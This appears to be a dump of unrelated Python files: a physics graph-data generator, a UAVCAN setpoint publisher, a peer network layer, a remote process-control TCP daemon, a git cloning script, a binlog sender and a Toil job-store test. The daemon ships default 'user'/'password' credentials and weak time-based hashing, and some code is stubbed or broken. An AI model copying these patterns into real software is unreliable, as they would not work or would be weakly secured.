meta_data.append(event_data[f][event_ind][cluster_ind])
return meta_data
def preprocessor(self, worker_id):
file_num = worker_id
while file_num < self.num_files:
print(f"Proceesing file number {file_num}")
f_name = self.pion_file_list[file_num]
event_tree = ur.open(f_name)['EventTree']
num_events = event_tree.num_entries
event_data = event_tree.arrays(library='np')
preprocessed_data = []
for event_ind in range(num_events):
num_clusters = event_data['nCluster'][event_ind]
for i in range(num_clusters):
cluster_calib_E = self.get_cluster_calib(event_data, event_ind, i)
if cluster_calib_E is None:
continue
nodes, global_node, cluster_num_nodes, cell_IDmap = self.get_nodes(event_data, event_ind, i)
senders, receivers, edges = self.get_edges(cluster_num_nodes, cell_IDmap)
graph = {'nodes': nodes.astype(np.float32), 'globals': global_node.astype(np.float32),
'senders': senders.astype(np.int32), 'receivers': receivers.astype(np.int32),
'edges': edges.astype(np.float32)}
target = np.reshape([cluster_calib_E.astype(np.float32), 1], [1,2])
meta_data = [f_name]
meta_data.extend(self.get_meta(event_data, event_ind, i))
meta_data.append('pion')
preprocessed_data.append((graph, target, meta_data))
f_name = self.pi0_file_list[file_num]
event_tree = ur.open(f_name)['EventTree']
num_events = event_tree.num_entries
event_data = event_tree.arrays(library='np')
for event_ind in range(num_events):
num_clusters = event_data['nCluster'][event_ind]
for i in range(num_clusters):
cluster_calib_E = self.get_cluster_calib(event_data, event_ind, i)
if cluster_calib_E is None:
continue
nodes, global_node, cluster_num_nodes, cell_IDmap = self.get_nodes(event_data, event_ind, i)
senders, receivers, edges = self.get_edges(cluster_num_nodes, cell_IDmap)
graph = {'nodes': nodes.astype(np.float32), 'globals': global_node.astype(np.float32),
'senders': senders.astype(np.int32), 'receivers': receivers.astype(np.int32),
'edges': edges.astype(np.float32)}
target = np.reshape([cluster_calib_E.astype(np.float32), 0], [1,2])
meta_data = [f_name]
meta_data.extend(self.get_meta(event_data, event_ind, i))
meta_data.append('pi0')
preprocessed_data.append((graph, target, meta_data))
random.shuffle(preprocessed_data)
pickle.dump(preprocessed_data, open(self.output_dir + f'data_{file_num:03d}.p', 'wb'), compression='gzip')
file_num += self.num_procs
print(f"Finished processing {file_num} files")
def preprocess_data(self):
print('\nPreprocessing and saving data to {}'.format(self.output_dir))
for i in range(self.num_procs):
p = Process(target=self.preprocessor, args=(i,), daemon=True)
p.start()
self.procs.append(p)
for p in self.procs:
p.join()
self.file_list = [self.output_dir + f'data_{i:03d}.p' for i in range(self.num_files)]
def preprocessed_worker(self, worker_id, batch_queue):
batch_graphs = []
batch_targets = []
batch_meta = []
file_num = worker_id
while file_num < self.num_files:
file_data = pickle.load(open(self.file_list[file_num], 'rb'), compression='gzip')
for i in range(len(file_data)):
batch_graphs.append(file_data[i][0])
batch_targets.append(file_data[i][1])
batch_meta.append(file_data[i][2])
if len(batch_graphs) == self.batch_size:
batch_targets = np.reshape(np.array(batch_targets), [-1,2]).astype(np.float32)
batch_queue.put((batch_graphs, batch_targets, batch_meta))
batch_graphs = []
batch_targets = []
batch_meta = []
file_num += self.num_procs
if len(batch_graphs) > 0:
batch_targets = np.reshape(np.array(batch_targets), [-1,2]).astype(np.float32)
batch_queue.put((batch_graphs, batch_targets, batch_meta))
def worker(self, worker_id, batch_queue):
if self.preprocess:
self.preprocessed_worker(worker_id, batch_queue)
else:
raise Exception('Preprocessing is required for combined classification/regression models.')
def check_procs(self):
for p in self.procs:
if p.is_alive(): return True
return False
def kill_procs(self):
for p in self.procs:
p.kill()
self.procs = []
def generator(self):
# for file in self.file_list:
batch_queue = Queue(2 * self.num_procs)
for i in range(self.num_procs):
p = Process(target=self.worker, args=(i, batch_queue), daemon=True)
p.start()
self.procs.append(p)
while self.check_procs() or not batch_queue.empty():
            try:
                batch = batch_queue.get(True, 0.0001)
            except:  # typically queue.Empty while workers are still producing
                continue
yield batch
for p in self.procs:
p.join()
if __name__ == '__main__':
data_dir = '/usr/workspace/pierfied/preprocessed/data/'
out_dir = '/usr/workspace/pierfied/preprocessed/preprocessed_data/'
pion_files = np.sort(glob.glob(data_dir+'user*.root'))
data_gen = MPGraphDataGenerator(file_list=pion_files,
cellGeo_file=data_dir+'cell_geo.root',
batch_size=32,
shuffle=False,
num_procs=32,
preprocess=True,
output_dir=out_dir)
gen = data_gen.generator()
from tqdm.auto import tqdm
for batch in tqdm(gen):
pass
exit()
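# A minimal sketch (not part of the original script) of inspecting one
# preprocessed output file, assuming the pickling above uses the
# compress_pickle package; the path below is illustrative only.
def inspect_preprocessed_file(path=out_dir + 'data_000.p'):
    import compress_pickle
    data = compress_pickle.load(path, compression='gzip')
    graph, target, meta = data[0]
    # graph holds the 'nodes', 'globals', 'senders', 'receivers', 'edges' arrays;
    # target is a [1, 2] array of (calibrated cluster energy, pion/pi0 label).
    print(graph['nodes'].shape, target, meta[-1])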
|
SetpointPublisher.py
|
import enum
import logging
import time
import threading
import uavcan
class ControlTopic(enum.Enum):
voltage = "voltage"
torque = "torque"
velocity = "velocity"
position = "position"
def __str__(self):
return self.value
def __call__(self, node_id, value):
return {
"voltage": uavcan.thirdparty.cvra.motor.control.Voltage(
node_id=node_id, voltage=value
),
"torque": uavcan.thirdparty.cvra.motor.control.Torque(
node_id=node_id, torque=value
),
"velocity": uavcan.thirdparty.cvra.motor.control.Velocity(
node_id=node_id, velocity=value
),
"position": uavcan.thirdparty.cvra.motor.control.Position(
node_id=node_id, position=value
),
}[self.value]
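# Illustration only (not in the original file): ControlTopic maps a CLI-style
# topic name onto the matching cvra UAVCAN setpoint message. Assuming the cvra
# DSDL namespace has been registered with pyuavcan; node id 42 is a placeholder.
def _example_topic_message():
    return ControlTopic("velocity")(node_id=42, value=1.5)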
class SetpointPublisher:
    def __init__(self, node, topic, motor, value_min, value_max, period):
        self.node = node
        self.topic = topic
        self.motor = motor
        self.value_min = value_min
        self.value_max = value_max
        self.period = period
        self.lock = threading.RLock()
        self.logger = logging.getLogger("SetpointPublisher")
        # Define the setpoint before the periodic callback can fire, otherwise
        # _publish may read self.value before _update has set it.
        self.value = value_min
        self.handle = node.node.periodic(0.01, self._publish)
        threading.Thread(target=self._update, daemon=True).start()
def _publish(self):
with self.lock:
            self.logger.info(
"Setpoint: {} {} to motor {} at period {}s".format(
self.topic, self.value, self.motor, self.period
)
)
self.node.node.broadcast(self.topic(node_id=self.motor, value=self.value))
def _update(self):
while True:
with self.lock:
self.value = self.value_min
time.sleep(self.period)
with self.lock:
self.value = self.value_max
time.sleep(self.period)
def update(self):
self.handle.remove()
self.handle = self.node.node.periodic(0.01, self._publish)
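# A hedged usage sketch; the uavcan node wrapper and motor id below are
# hypothetical placeholders, not provided by this module.
def _example_publisher(node):
    # `node` is expected to expose a pyuavcan node as node.node
    return SetpointPublisher(node, ControlTopic.velocity, motor=42,
                             value_min=-1.0, value_max=1.0, period=2.0)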
|
network_layer.py
|
import time
import threading
from threading import Thread
import datetime
import json
import traceback
import socket
#import networking
import tcp
import udp
import uuid
from connection_state import ConnectionState
def is_published_function(application, function_name):
# does the function exist on this application?
has_function = hasattr(application, function_name)
# is the function published on this application
function_is_published = True
has_published_function_list = hasattr(application, "published_functions")
if has_published_function_list:
function_is_published = function_name in application.published_functions
return has_function and function_is_published
"""
remote_application_manager
--------------------------
used to define what remote interfaces are expected and how they are connected to
expected incoming connections
expected outgoing connections
initializer function for starting up the peer application's process (if not already running)
is_running function for checking if the peer application is running
"""
class peer_application(object):
def __init__(
self,
failed_to_connect_callback=None,
message_received_callback=None,
keep_alive_timeout_callback=None,
new_peer_connected_callback=None,
peer_disconnected_callback=None
):
pass
def start_application(self):
pass
def stop_application(self):
pass
def is_running(self):
pass
# api endpoints provided by a process running on this machine which we (might) have permissions to start/stop.
class peer_local_application(peer_application):
def __init__(
self,
failed_to_connect_callback=None,
message_received_callback=None,
keep_alive_timeout_callback=None,
new_peer_connected_callback=None,
peer_disconnected_callback=None
):
pass
def start_application(self):
pass
def stop_application(self):
pass
def is_running(self):
pass
class peer_remote_application(peer_application):
def __init__(self, **kwargs):
"""
The accepted keyword arguments and their default values are:
"local_application": <object>, The local_application object that will provide functions to the peer application(s).
"application_name": "app1", The expected peer application's name. Must match the name reported by the peer.
"connected_application_min": 1, Minimum number of connected instances of the application before application is considered to be running.
"connected_application_max": 1, Maximum number of instances of the application allowed to connect to us.
"is_host": True, if True, we init connection to the peer. If False, the peer inits connection to us.
"peer_endpoints": [], Expects either None, an empty list, or a list of endpoints from which connections may be made.
'peer_endpoints' is required if is_host=True. If list is empty or None, any peer endpoints may connect.
If is_host, connections will be attempted until 'connected_application_min' is reached.
To specify that any port from a given IP may be used, set the port number to "*" instead of an integer.
[[<ip>, <port>], ...]
"""
        keyword_arguments = {
            "local_application": None,  # Will need a better default than null. An actual local_application object with no public functions.
            "application_name": "app1",
            "connected_application_min": 1,
            "connected_application_max": 1,
            "is_host": True,  # Is the application we're connecting to the host? If True, we initiate connection to the peer. If False, the peer initiates connection to us.
            "peer_endpoints": [],
        }
# assign properties from the keyword arguments.
self.apply_keyword_arguments(keyword_arguments, kwargs)
"""
any_peers_allowed = self.peer_endpoints != None and len(self.peer_endpoints) < 1
if any_peers_allowed:
self.peer_endpoints = None
"""
def apply_keyword_arguments(self, default_keyword_arguments, keyword_arguments):
for argument, default_value in default_keyword_arguments.items():
value = default_value
if argument in keyword_arguments.keys():
value = keyword_arguments[argument]
setattr(self, argument, value)
def start_application(self, application_interface = None):
pass
def stop_application(self):
pass
def is_running(self):
return True
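# A hedged construction sketch for peer_remote_application; the application
# name and endpoint below are illustrative placeholders.
def _example_peer_remote_application():
    return peer_remote_application(
        application_name="app1",
        is_host=True,
        connected_application_min=1,
        connected_application_max=1,
        peer_endpoints=[["192.168.1.50", 59779]],
    )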
class peer_application_manager:
def __init__(self, peer_application_list):
self.peer_application_list = peer_application_list
self.start_managing_applications()
def start_managing_applications(self):
pass
class tcp_client_group:
def __init__(self):
self.client_map = {
# "<ip>_<port>": <TCP_Client object>
}
def send_message(self, message, json_encode=False, prepare=True):
for peer, tcp_client in self.client_map.items():
tcp_client.send_message(message, json_encode, prepare)
# Returns a list of lists: [[addr, timestamp, message], ...]
def pop_all_messages(self, decode_json=False):
messages = []
for peer, tcp_client in self.client_map.items():
messages.extend(tcp_client.pop_all_messages(decode_json))
return messages
class peer_application_interface:
def __init__(self, local_port=59779, peer_endpoints=[]):
        self.application = None  # set later via set_application_object()
        self.application_map = {
            # <application_name>: application_object
        }
self.server_ip = socket.gethostbyname(socket.gethostname())
self.server_port = local_port
self.target_ip = None
self.target_port = None
self.buffer_size = 512
        self.server = None #udp.UDP_Client(True, server_ip, server_port, None, None, buffer_size, True, message_received_callback, keep_alive_timeout_callback, new_peer_connected_callback)
        self.server_type = "Client"
        self.communication_type = "udp"
        self.keep_alive = True
        # init_server() passes this attribute to the transport, so it must
        # exist even before set_callbacks() is called.
        self.message_received_callback = None
self.remote_application_map = {
# "application_name": [[ip, port], [published function list]],
}
self.peer_map = {
# "<ip>_<port>": "application_name"
}
self.unidentified_remote_applications = [
# [<ip>, <port>],
]
self.execution_callback_map = {
#
}
self.built_in_function_list = [
"get_function_list",
"identify",
]
self.message_queue = []
self.check_for_function_return_interval = 0.05
self.remote_application_identification_interval = 0.3
self.message_queue_processing_interval = 0.05
self.connection_state = ConnectionState(False)
self.internal_thread_init()
self.init_server()
# let's init connections to the provided peer endpoints.
self.target_peer_endpoints = []
for peer_endpoint in peer_endpoints:
self.target_peer_endpoints.append(peer_endpoint)
self.initiate_contact_with_peers()
def initiate_contact_with_peers(self):
# simply send the keep-alive message to each peer
for peer_endpoint in self.target_peer_endpoints:
peer_ip, peer_port = peer_endpoint
self.server.send_message("1", False, False, peer_ip, peer_port)
def internal_thread_init(self):
self.connection_state = ConnectionState(True)
Thread(target=self.remote_application_identification).start()
Thread(target=self.message_queue_processor).start()
    def identify(self, peer, message_id):
        pass
def remote_application_identification(self):
current_connection_state = self.connection_state
while self.connection_state.active:
time.sleep(self.remote_application_identification_interval)
# loop through the peer_map list
for peer, application_name in self.peer_map.items():
                target_ip, target_port = peer.split("_")
                target_port = int(target_port)
if application_name != None:
continue
# get that peer's list of applications along with published functions on those applications
                results = self.execute_remote_function("identify", target_ip=target_ip, target_port=target_port, message_type="internal_function_call")
def message_queue_processor(self):
current_connection_state = self.connection_state
while self.connection_state.active:
time.sleep(self.message_queue_processing_interval)
            while len(self.message_queue) > 0:
                message = self.message_queue.pop(0)
peer = message[0]
ip, port = peer
timestamp = int(message[1])
data = message[2]
if len(data) < 2:
continue
message_type = data["type"]
if message_type == "function_call":
message_id = data["id"]
function_name = data["function"]
arguments = data["arguments"]
                    # execute the function if it's published; the target application
                    # name is assumed to ride along in the message payload.
                    self.execute_application_function(peer, message_id, function_name, data.get("application"), arguments)
elif message_type == "internal_function_call":
message_id = data["id"]
function_name = data["function"]
arguments = data["arguments"]
if function_name in self.built_in_function_list:
getattr(self, function_name)(peer, message_id, *arguments)
elif message_type == "response":
message_id = data["id"]
results = data["results"]
def shutdown(self):
        self.connection_state.active = False
self.server.disconnect()
def restart(self):
self.server.reconnect()
self.internal_thread_init()
    def get_function_list(self, peer, message_id):
        response = ""
def receive_function_list(self, message):
pass
def _handle_remote_function_return(self, message_id, message):
pass
def execute_remote_function(self, function_name, *arguments, target_ip, target_port, callback_function=None, message_type="function_call"):
# convert function name and args to a list object
_callback_function = callback_function
if _callback_function == None:
pass
message_id = str(uuid.uuid4())
message = {
"message_type": message_type,
"id": message_id,
"function": function_name,
"arguments": arguments,
}
self.server.send_message(message, True, True, target_ip, target_port)
        if callback_function == None:
            results = None
            # Block until either the endpoint responds or disconnects.
            # TODO: response collection is not implemented yet, so poll once
            # and return instead of spinning on an unreachable return.
            time.sleep(self.check_for_function_return_interval)
            return results
def _execute_application_function(self, peer, message_id, function_name, application_name, arguments):
target_ip, target_port = peer
if is_published_function(self.application, function_name):
results = getattr(self.application, function_name)(*arguments)
response = {
"message_type": "response",
"id": message_id,
"results": results,
}
self.server.send_message(response, True, True, target_ip, target_port)
else:
# return a server response indicating the function either doesn't exist or isn't published.
error_message = "The function [%s] is not a published function in the application '%s'" % (function_name, application_name)
response = {
"message_type": "error",
"id": message_id,
"function": function_name,
"error": error_message,
}
self.server.send_message(response, True, True, target_ip, target_port)
    def execute_application_function(self, peer, message_id, function_name, application_name, arguments):
        Thread(target=self._execute_application_function, args=[peer, message_id, function_name, application_name, arguments]).start()
def failed_to_connect_callback(self, target_ip, target_port):
pass
def handle_message_received(self):
messages = self.server.pop_all_messages()
for message in messages:
if self.application == None:
continue
self.message_queue.append(message)
def keep_alive_timeout_callback(self, ip, port):
if self.application == None:
return
function_to_call = "keep_alive_timeout"
peer = "%s_%s" % (ip, port)
if is_published_function(self.application, function_to_call):
getattr(self.application, function_to_call)(peer) #(*arguments)
        # notify all pending remote function execution response listeners.
        handler_queue = self.execution_callback_map.get(peer, [])
        for handler_pair in handler_queue:
            response_handler, disconnect_handler = handler_pair
            disconnect_handler(peer)
        # remove this peer from the execution callback map
        self.execution_callback_map.pop(peer, None)
def peer_disconnected_callback(self, ip, port):
pass
def new_peer_connected_callback(self, ip, port):
if self.application == None:
return
function_to_call = "handle_new_peer_connection"
peer = "%s_%s" % (ip, port)
if is_published_function(self.application, function_to_call):
getattr(self.application, function_to_call)(peer) #(*arguments)
        # add this peer to the execution callback map
self.execution_callback_map[peer] = []
# add this peer to the peer_map.
self.peer_map[peer] = None
# this function expects an object (module or class instance)
    def set_application_object(self, _application):
"""
Note: You can pass the current module as an object to this function.
import sys
current_module = sys.modules[__name__]
"""
self.application = _application
    def set_network_configuration(self, config):
        """
        Config must be a dictionary that looks like this:
        {
            "server_ip": <ip>,
            "server_port": <port>,
            "target_ip": None,
            "target_port": None,
            "buffer_size": 512,
            "communication_type": "udp",
            "server_type": "Client"
        }
        """
        self.server_ip = config["server_ip"]
        self.server_port = config["server_port"]
        self.target_ip = config.get("target_ip")
        self.target_port = config.get("target_port")
        self.buffer_size = config.get("buffer_size", 512)
        self.communication_type = config.get("communication_type", "udp")
        self.server_type = config.get("server_type", "Client").lower().capitalize()
        # Keep-alive is required for this remote application interface, so it is forced on.
        self.keep_alive = True
def set_callbacks(self, _message_received_callback, _keep_alive_timeout_callback, _new_peer_connected_callback):
self.message_received_callback = _message_received_callback
self.keep_alive_timeout_callback = _keep_alive_timeout_callback
self.new_peer_connected_callback = _new_peer_connected_callback
def init_server(self):
if self.communication_type in globals():
communication_module = globals()[self.communication_type]
            communication_class_name = "%s_%s" % (self.communication_type.upper(), self.server_type)
if hasattr(communication_module, communication_class_name):
communication_class = getattr(communication_module, communication_class_name)
self.server = communication_class(
True, # start listening now
self.server_ip,
self.server_port,
self.target_ip,
self.target_port,
self.buffer_size,
self.keep_alive, # send keep-alive packets
self.failed_to_connect_callback,
self.message_received_callback,
self.keep_alive_timeout_callback,
self.new_peer_connected_callback,
self.peer_disconnected_callback
)
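# A hedged end-to-end sketch (illustrative values only): stand up an interface
# on the default port and invoke a published function on a known peer.
def _example_interface_usage():
    iface = peer_application_interface(local_port=59779,
                                       peer_endpoints=[["192.168.1.50", 59779]])
    # iface.set_application_object(some_module_or_instance)  # expose local functions
    # result = iface.execute_remote_function("ping", target_ip="192.168.1.50", target_port=59779)
    return iface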
|
wrapper.py
|
#!/usr/bin/env python
import subprocess
import sys
import os
import time
import inspect
import json
import socket
import threading
import SocketServer
import traceback
import hashlib
os.chdir(sys.path[0] or '.')
global current_dir
folders = sys.argv[0].split(os.sep)
proper_path = os.sep.join(folders[0:-1])
current_dir = os.path.join(os.getcwd(),proper_path)
if current_dir.endswith("."):
current_dir = current_dir[0:-1]
class ProcessControl(object):
def __init__(self,process_exec):
self.proc = None
self.process_exec = process_exec
def start(self):
isonline = self.check()
if isonline=="OFF-LINE":
if self.proc==None:
self.proc = subprocess.Popen(self.process_exec.split(" "))
print("STARTED")
            try:
                # block until the child exits
                self.proc.wait()
            except Exception,e:
                pass
def kill(self):
isonline = self.check()
if isonline=="ON-LINE":
if not self.proc==None:
self.proc.kill()
print("KILLED")
self.proc = None
return("KILLED")
else:
return("NO SERVER")
    def check(self):
        if self.proc==None:
            return("OFF-LINE")
        else:
            return("ON-LINE")
class ThreadedTCPRequestHandler(SocketServer.BaseRequestHandler):
def handle(self):
conf = config(os.path.join(current_dir,"config"))
for data in conf["processes"]:
self.server.child_process[data]["password"] = conf["processes"][data]["password"]
data = self.request.recv(1024)
protodata = data.split(",")
proc = protodata[0]
user = protodata[1]
hpass = protodata[2]
action = protodata[3]
password = hash(self.server.child_process[proc]["password"]+str(time.time())[0:9]+action)
if user == conf["username"] and hpass == password:
if action=="start":
response = "OK"
self.request.sendall(response)
self.server.child_process[proc]["process"].start()
if action=="stop":
response = self.server.child_process[proc]["process"].kill()
self.request.sendall(response)
if action=="restart":
self.server.child_process[proc]["process"].kill()
response = "OK"
self.request.sendall(response)
self.server.child_process[proc]["process"].start()
if action=="check":
response = self.server.child_process[proc]["process"].check()
self.request.sendall(response)
else:
print("bad user/pass")
class ThreadedTCPServer(SocketServer.ThreadingMixIn, SocketServer.TCPServer):
def __init__(self, child_process, *args, **kwargs):
self.child_process = child_process
SocketServer.TCPServer.__init__(self, *args, **kwargs)
def config_init(configlocation):
if not os.path.exists(configlocation):
open(configlocation, 'w').write(inspect.cleandoc(
r'''{
"processes": {
"1": {
"process": "/command/to/exe",
"password": "password"
}
},
"username": "user",
"port": 16260
}''') + '\n')
def config(configlocation):
try:
con = json.load(open(configlocation))
return(con)
except ValueError, e:
print 'ERROR: malformed config!', e
def hash(input):
return(hashlib.sha256(input).hexdigest())
def main():
i = 0
proc = None
server = None
conflocation = os.path.join(current_dir,"config")
config_init(conflocation)
global conf
conf = config(conflocation)
child_process = {}
for data in conf["processes"]:
child_process[data] = {}
child_process[data]["process"] = ProcessControl(conf["processes"][data]["process"])
child_process[data]["password"] = conf["processes"][data]["password"]
try:
while True:
if i==0:
                ThreadedTCPServer.allow_reuse_address = True
server = ThreadedTCPServer(child_process, ("0.0.0.0", conf["port"]), ThreadedTCPRequestHandler)
ip, port = server.server_address
server_thread = threading.Thread(target=server.serve_forever)
server_thread.daemon = True
server_thread.start()
print("Started the process daemon.")
                i += 1
time.sleep(.1)
except Exception,e:
type_, value_, traceback_ = sys.exc_info()
ex = traceback.format_exception(type_, value_, traceback_)
trace = ""
for data in ex:
trace = str(trace+data)
if not proc==None:
proc.kill()
if not server==None:
server.shutdown()
print("SHUTDOWN")
else:
print("Failed to start.\n"+str(trace))
main()
#TODO:
#config file
#multiplexing
|
remise.py
|
#!/usr/bin/python3
import json
import subprocess
# import dummy_threading as threading
import threading
import argparse
parser = argparse.ArgumentParser(description="git repo fetcher")
parser.add_argument("--destination", help="base dir destination")
parser.add_argument("--branch", help="branch to be checked out")
args = parser.parse_args()
BASE_DIR = "build"
BRANCH = "remise_4"
if args.destination is not None:
    BASE_DIR = args.destination
if args.branch is not None:
    BRANCH = args.branch
LOG_DIR = "log"
with open('mapping.json') as fd:
    mapping = json.load(fd)
def writeBranch(destinationDir):
    # record the checked-out branch name next to the clone
    with open(destinationDir + "/BRANCH.txt", 'w') as logFile:
        subprocess.run(["git", "-C", destinationDir, "rev-parse", "--abbrev-ref", "HEAD"], stdout=logFile, stderr=logFile)
def clone(repoUrl, destinationDir, logFilePath):
    with open(logFilePath, "w") as logFile:
        try:
            subprocess.run(["git", "clone", repoUrl, destinationDir], stdout=logFile, stderr=logFile)
            subprocess.run(["git", "-C", destinationDir, "checkout", "--track", "origin/{}".format(BRANCH)], stdout=logFile, stderr=logFile)
            writeBranch(destinationDir)
        except Exception:
            pass  # failures are visible in the per-repo log file
    print("Done cloning {}".format(repoUrl))
threads = []
for cours, repos in mapping.items():
    subprocess.run(["mkdir", "-p", BASE_DIR + "/" + LOG_DIR + "/" + cours])
    for repo in repos['repos']:
        cloneDir = BASE_DIR + "/" + cours + "/" + repo['equipe']
        logFilePath = BASE_DIR + "/" + LOG_DIR + "/" + cours + "/" + repo['equipe'] + ".txt"
        thread = threading.Thread(target=clone, args=(repo['url'], cloneDir, logFilePath))
        threads.append(thread)
for thread in threads:
    thread.start()
for thread in threads:
    thread.join()
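# For reference, a minimal mapping.json matching the shape this script reads;
# course names, team names and URLs below are illustrative placeholders:
# {
#     "inf1900": {
#         "repos": [
#             {"equipe": "equipe01", "url": "https://example.org/equipe01.git"}
#         ]
#     }
# }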
|
binlogSenderManager.py
|
# Copyright (c) 2020-present ly.com, Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#!/usr/bin/python
#-*- coding:utf8 -*-
import sys
import os
import threading
import Queue
from mysqlSender import MysqlSender
from fileSender import FileSender
from kafkaSender import KafkaSender
class BinlogSenderManager(threading.Thread):
    def __init__(self, config, queue, ackFunc):
        threading.Thread.__init__(self)
        self.sendTypeList = list(set(config.get('type').split(',')))
        self.senderList = []
        self.queue = queue
        self.ackCallBack = ackFunc
        self.onceSendCount = 100
        self.ackIDUpdateLock = threading.Lock()
        self.ackIDCountDict = {}
        self.ackCount = []
        self._stop = False
for sendType in self.sendTypeList:
if sendType == 'kafka':
sender = KafkaSender(config)
self.senderList.append(sender)
elif sendType == 'mysql':
sender = MysqlSender(config)
self.senderList.append(sender)
elif sendType == 'file':
sender = FileSender(config)
self.senderList.append(sender)
else:
continue
if len(self.senderList) == 0:
raise Exception("no sender init")
def onSenderAck(self, ackTsList):
self.ackIDUpdateLock.acquire()
maxAckID = 0
for ackTs in ackTsList:
if ackTs not in self.ackIDCountDict:
continue
self.ackIDCountDict[ackTs] += 1
for key, count in self.ackIDCountDict.items():
if count >= len(self.senderList):
maxAckID = key
else:
break
if maxAckID > 0:
self.ackCallBack(maxAckID)
self.ackIDUpdateLock.release()
    def ackThreadFunc(self):
        # placeholder: the ack-thread body is not present in this file; a real
        # implementation would drain sender acks and feed them to onSenderAck.
        pass
    def init(self):
        for sender in self.senderList:
            if not sender.init():
                return False
        self.ackThread = threading.Thread(target = self.ackThreadFunc)
        self.ackThread.setDaemon(True)
        return True
    def start(self):
        self.ackThread.start()
        for sender in self.senderList:
            sender.start()
        senderCount = len(self.senderList)
        while not self._stop:
            # collect a batch of up to 1000 binlog events before fanning out
            binlogList = []
            maxID = 0
            for i in range(0, 1000):
                blog = self.queue.get()
                binlogList.append(blog)
                self.ackCount.append(0)
                if maxID < blog['commitTs']:
                    maxID = blog['commitTs']
                self.ackIDCountDict[blog['commitTs']] = 0
                if self.queue.empty():
                    break
            for sender in self.senderList:
                sender.send(binlogList)
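# The intended ack flow above (illustrative values, hedged): each sender
# reports the commit timestamps it has flushed via onSenderAck; once a
# timestamp has been acked by every sender, the highest fully-acked timestamp
# is passed to the upstream ackFunc.
#   ackIDCountDict = {100: 0, 200: 0}
#   onSenderAck([100, 200])   # first sender acked both
#   onSenderAck([100])        # second sender acked only 100
#   -> ackCallBack(100), since 200 is not yet acked by all senders.
# Note: the scan in onSenderAck assumes ackIDCountDict iterates in ascending
# commitTs order, which plain dicts do not guarantee on Python 2.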
|
jobStoreTest.py
|
# Copyright (C) 2015-2016 Regents of the University of California
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from __future__ import division
from future import standard_library
standard_library.install_aliases()
from builtins import range
from builtins import str
from past.utils import old_div
from builtins import object
import socketserver
import pytest
import hashlib
import logging
import threading
import os
import sys
import shutil
import tempfile
import time
import uuid
from stubserver import FTPStubServer
from abc import abstractmethod, ABCMeta
from itertools import chain, islice
from threading import Thread
from six.moves.queue import Queue
from six.moves import SimpleHTTPServer, StringIO
from six import iteritems
import six.moves.urllib.parse as urlparse
from six.moves.urllib.request import urlopen, Request
from toil.lib.memoize import memoize
from toil.lib.exceptions import panic
# noinspection PyPackageRequirements
# (installed by `make prepare`)
from toil.lib.compatibility import USING_PYTHON2
from toil.common import Config, Toil
from toil.fileStores import FileID
from toil.job import Job, JobNode
from toil.jobStores.abstractJobStore import (NoSuchJobException,
NoSuchFileException)
from toil.jobStores.fileJobStore import FileJobStore
from toil.statsAndLogging import StatsAndLogging
from toil.test import (ToilTest,
needs_aws_s3,
needs_encryption,
make_tests,
needs_google,
travis_test,
slow)
from future.utils import with_metaclass
# Need googleRetry decorator even if google is not available, so make one up.
# Unconventional use of decorator to determine if google is enabled by seeing if
# it returns the parameter passed in.
if needs_google(needs_google) is needs_google:
from toil.jobStores.googleJobStore import googleRetry
else:
def googleRetry(x):
return x
logger = logging.getLogger(__name__)
def tearDownModule():
AbstractJobStoreTest.Test.cleanUpExternalStores()
class AbstractJobStoreTest(object):
"""
Hide abstract base class from unittest's test case loader
http://stackoverflow.com/questions/1323455/python-unit-test-with-base-and-sub-class#answer-25695512
"""
class Test(with_metaclass(ABCMeta, ToilTest)):
@classmethod
def setUpClass(cls):
super(AbstractJobStoreTest.Test, cls).setUpClass()
logging.basicConfig(level=logging.DEBUG)
logging.getLogger('boto').setLevel(logging.CRITICAL)
        # The use of @memoize ensures that we only have one instance per class, even when the
        # generative import/export tests attempt to instantiate more. This in turn enables us to
        # share the external stores (buckets, blob store containers, local directories, etc.) used
        # for testing import/export. While the constructor arguments are included in the
        # memoization key, I have only ever seen one case: ('test', ). The worst that can happen
        # if other values are also used is that there will be more external stores and less sharing
        # of them. They will still all be cleaned up.
@classmethod
@memoize
def __new__(cls, *args):
return super(AbstractJobStoreTest.Test, cls).__new__(cls)
def _createConfig(self):
return Config()
@abstractmethod
def _createJobStore(self):
"""
:rtype: AbstractJobStore
"""
raise NotImplementedError()
def setUp(self):
super(AbstractJobStoreTest.Test, self).setUp()
self.namePrefix = 'jobstore-test-' + str(uuid.uuid4())
self.config = self._createConfig()
# Jobstores to be used in testing.
            # jobstore_initialized is created with a particular configuration, as created by self._createConfig().
            # jobstore_resume_noconfig is created with the resume() method. resume() will look for a previously
            # instantiated jobstore, and initialize the jobstore by calling it with the found config. In this case,
            # jobstore_resume_noconfig will be initialized with the config from jobstore_initialized.
self.jobstore_initialized = self._createJobStore()
self.jobstore_initialized.initialize(self.config)
self.jobstore_resumed_noconfig = self._createJobStore()
self.jobstore_resumed_noconfig.resume()
# Requirements for jobs to be created.
self.arbitraryRequirements = {'memory': 1, 'disk': 2, 'cores': 1, 'preemptable': False}
self.arbitraryJob = JobNode(command='command',
jobStoreID=None,
jobName='arbitrary', unitName=None,
requirements=self.arbitraryRequirements)
self.parentJobReqs = dict(memory=12, cores=34, disk=35, preemptable=True)
self.childJobReqs1 = dict(memory=23, cores=45, disk=46, preemptable=True)
self.childJobReqs2 = dict(memory=34, cores=56, disk=57, preemptable=False)
def tearDown(self):
self.jobstore_initialized.destroy()
self.jobstore_resumed_noconfig.destroy()
super(AbstractJobStoreTest.Test, self).tearDown()
@travis_test
def testInitialState(self):
"""Ensure proper handling of nonexistant files."""
self.assertFalse(self.jobstore_initialized.exists('nonexistantFile'))
self.assertRaises(NoSuchJobException, self.jobstore_initialized.load, 'nonexistantFile')
@travis_test
def testJobCreation(self):
"""
Test creation of a job.
Does the job exist in the jobstore it is supposed to be in?
Are its attributes what is expected?
"""
